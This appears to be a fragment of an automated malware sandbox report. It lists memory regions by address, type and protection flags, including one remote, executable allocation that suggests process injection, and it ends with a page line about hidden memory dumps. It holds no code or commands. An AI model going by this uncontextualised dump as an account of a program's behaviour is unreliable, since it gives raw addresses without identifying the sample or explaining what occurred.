page read and write
147A000
trusted library allocation
page execute and read and write
960000
heap
page readonly
6D9E000
heap
page read and write
742A000
trusted library allocation
page read and write
7C0D000
stack
page read and write
34DC000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page read and write
7550000
trusted library allocation
page execute and read and write
7FCD8000
trusted library allocation
page execute and read and write
4690000
trusted library allocation
page execute and read and write
17D0000
trusted library allocation
page read and write
4F90000
trusted library allocation
page read and write
57F6000
trusted library allocation
page read and write
7CAE000
stack
page read and write
7FFD9B990000
trusted library allocation
page execute and read and write
2675F432000
heap
page read and write
4426000
trusted library allocation
page read and write
14FE000
stack
page read and write
705E000
stack
page read and write
5A00000
heap
page read and write
6FCA000
trusted library allocation
page read and write
45C4000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
7020000
trusted library allocation
page execute and read and write
267795A0000
trusted library section
page read and write
8410000
trusted library allocation
page read and write
7FF423B50000
trusted library allocation
page execute and read and write
437C000
stack
page read and write
830E000
stack
page read and write
7FFD9B7B4000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
C06000
heap
page read and write
3342000
trusted library allocation
page read and write
6C10000
trusted library allocation
page read and write
57C8000
trusted library allocation
page read and write
43AD000
trusted library allocation
page read and write
6E2E000
stack
page read and write
7262000
heap
page read and write
59E000
stack
page read and write
890000
trusted library allocation
page read and write
4617000
trusted library allocation
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
1790000
trusted library allocation
page read and write
D28000
trusted library allocation
page read and write
6392000
heap
page read and write
2675F260000
heap
page read and write
870000
trusted library allocation
page read and write
BC7000
heap
page read and write
6BAE000
stack
page read and write
B1F000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
6330000
heap
page read and write
7580000
trusted library allocation
page read and write
802B000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
57D9000
trusted library allocation
page read and write
3391000
trusted library allocation
page read and write
7C4E000
stack
page read and write
149B000
trusted library allocation
page execute and read and write
71F9000
heap
page read and write
7140000
trusted library allocation
page read and write
748E000
stack
page read and write
7120000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
B40000
heap
page read and write
36D2000
trusted library allocation
page read and write
6FD0000
trusted library allocation
page read and write
57EE000
trusted library allocation
page read and write
1550000
heap
page read and write
350F000
trusted library allocation
page read and write
6CE1000
trusted library allocation
page read and write
1900000
trusted library allocation
page read and write
457A000
trusted library allocation
page read and write
33FC000
trusted library allocation
page read and write
43D8000
trusted library allocation
page read and write
1936000
heap
page read and write
57F1000
trusted library allocation
page read and write
10B9000
stack
page read and write
45DE000
trusted library allocation
page read and write
2675F3FC000
heap
page read and write
353F000
trusted library allocation
page read and write
7F70000
trusted library allocation
page read and write
2675F513000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
7D78000
heap
page read and write
6A2E000
stack
page read and write
8D0000
trusted library allocation
page read and write
267795B7000
trusted library section
page read and write
7570000
trusted library allocation
page read and write
33A9000
trusted library allocation
page read and write
88D000
trusted library allocation
page execute and read and write
7000000
trusted library allocation
page execute and read and write
7211000
heap
page read and write
1920000
trusted library allocation
page read and write
C7E000
stack
page read and write
193B000
trusted library allocation
page execute and read and write
CE0000
trusted library section
page read and write
56FE000
stack
page read and write
400000
remote allocation
page execute and read and write
6E50000
trusted library allocation
page read and write
6CDE000
trusted library allocation
page read and write
2675F620000
heap
page read and write
491B000
trusted library allocation
page read and write
45C000
stack
page read and write
7CEE000
stack
page read and write
42BE000
stack
page read and write
7190000
trusted library allocation
page read and write
4E1C000
trusted library allocation
page read and write
1453000
trusted library allocation
page execute and read and write
18E0000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page execute and read and write
75C0000
trusted library allocation
page read and write
750D9FF000
stack
page read and write
6BC0000
trusted library allocation
page read and write
456E000
trusted library allocation
page read and write
71CC000
heap
page read and write
D14000
trusted library allocation
page read and write
464A000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
1890000
heap
page read and write
6DBA000
heap
page read and write
7190000
heap
page read and write
2675F570000
heap
page read and write
42F1000
trusted library allocation
page read and write
70B0000
trusted library allocation
page execute and read and write
6D72000
heap
page read and write
8B5000
trusted library allocation
page execute and read and write
7FCC0000
trusted library allocation
page execute and read and write
750D1A3000
stack
page read and write
33D9000
trusted library allocation
page read and write
375C000
trusted library allocation
page read and write
7FB90000
trusted library allocation
page execute and read and write
4695000
trusted library allocation
page read and write
880E000
stack
page read and write
65CD000
stack
page read and write
7FFD9B840000
trusted library allocation
page read and write
458A000
trusted library allocation
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
16EC000
stack
page read and write
80F0000
heap
page read and write
750D4FF000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
15EF000
heap
page read and write
7D88000
heap
page read and write
6B2D000
stack
page read and write
315E000
stack
page read and write
1497000
trusted library allocation
page execute and read and write
750DAFF000
stack
page read and write
4400000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
6C7D000
stack
page read and write
1440000
trusted library allocation
page read and write
7E44000
heap
page read and write
43C3000
trusted library allocation
page read and write
463C000
trusted library allocation
page read and write
6E6E000
stack
page read and write
7D00000
trusted library allocation
page read and write
6E40000
trusted library allocation
page execute and read and write
4EE3000
trusted library allocation
page read and write
3399000
trusted library allocation
page read and write
6CD0000
trusted library allocation
page read and write
4610000
heap
page execute and read and write
7B8000
heap
page read and write
43E2000
trusted library allocation
page read and write
44FC000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
5143000
trusted library allocation
page read and write
1922000
trusted library allocation
page read and write
2675F3E0000
trusted library allocation
page read and write
4576000
trusted library allocation
page read and write
6A2B000
stack
page read and write
8160000
trusted library allocation
page read and write
163C000
heap
page read and write
510000
heap
page read and write
FE0000
unkown
page readonly
73D0000
trusted library allocation
page execute and read and write
34E2000
trusted library allocation
page read and write
6E7E000
stack
page read and write
6B60000
heap
page execute and read and write
FC0000
heap
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
81DD000
stack
page read and write
838E000
stack
page read and write
1470000
trusted library allocation
page read and write
433E000
stack
page read and write
7FFD9B793000
trusted library allocation
page execute and read and write
D10000
trusted library allocation
page read and write
4487000
trusted library allocation
page read and write
17A7000
trusted library allocation
page read and write
DBE000
stack
page read and write
87CD000
stack
page read and write
7B70000
heap
page read and write
5E0000
heap
page read and write
70E0000
trusted library allocation
page read and write
4DB8000
trusted library allocation
page read and write
6EE0000
heap
page read and write
6FC4000
trusted library allocation
page read and write
34E7000
trusted library allocation
page read and write
6D1E000
stack
page read and write
1450000
trusted library allocation
page read and write
6D9D000
stack
page read and write
1410000
heap
page read and write
4438000
trusted library allocation
page read and write
3489000
trusted library allocation
page read and write
1560000
heap
page read and write
7100000
trusted library section
page read and write
870D000
stack
page read and write
4678000
trusted library allocation
page read and write
33FE000
trusted library allocation
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
970000
trusted library allocation
page execute and read and write
6B30000
heap
page read and write
6DA4000
heap
page read and write
2675F5C0000
trusted library section
page read and write
6AAD000
stack
page read and write
2675F172000
unkown
page readonly
1935000
trusted library allocation
page execute and read and write
2675F340000
heap
page read and write
43BE000
stack
page read and write
6BB7000
heap
page read and write
18DE000
stack
page read and write
146D000
trusted library allocation
page execute and read and write
6908000
stack
page read and write
750E000
stack
page read and write
8230000
heap
page read and write
464F000
stack
page read and write
FD0000
heap
page read and write
750D6FE000
stack
page read and write
3359000
trusted library allocation
page read and write
34DA000
trusted library allocation
page read and write
8259000
heap
page read and write
D50000
trusted library allocation
page read and write
4D1D000
trusted library allocation
page read and write
6BD3000
heap
page read and write
467A000
trusted library allocation
page read and write
4588000
trusted library allocation
page read and write
8219000
heap
page read and write
2675F42F000
heap
page read and write
6E30000
trusted library allocation
page read and write
6B89000
stack
page read and write
B6C000
heap
page read and write
50FD000
trusted library allocation
page read and write
4691000
trusted library allocation
page read and write
6B65000
heap
page execute and read and write
82C9000
stack
page read and write
750D8FD000
stack
page read and write
728000
heap
page read and write
1460000
trusted library allocation
page read and write
43D2000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
5E5000
heap
page read and write
50E8000
trusted library allocation
page read and write
51C8000
trusted library allocation
page read and write
8030000
heap
page read and write
899000
trusted library allocation
page read and write
34B6000
trusted library allocation
page read and write
2675F45A000
heap
page read and write
AD0000
heap
page read and write
B78000
heap
page read and write
660E000
stack
page read and write
71E7000
heap
page read and write
82E000
stack
page read and write
821E000
heap
page read and write
4BAB000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
7070000
trusted library section
page read and write
7DE8000
heap
page read and write
1570000
heap
page read and write
6A6E000
stack
page read and write
715E000
stack
page read and write
8020000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
There are 784 hidden memdumps, click here to show them.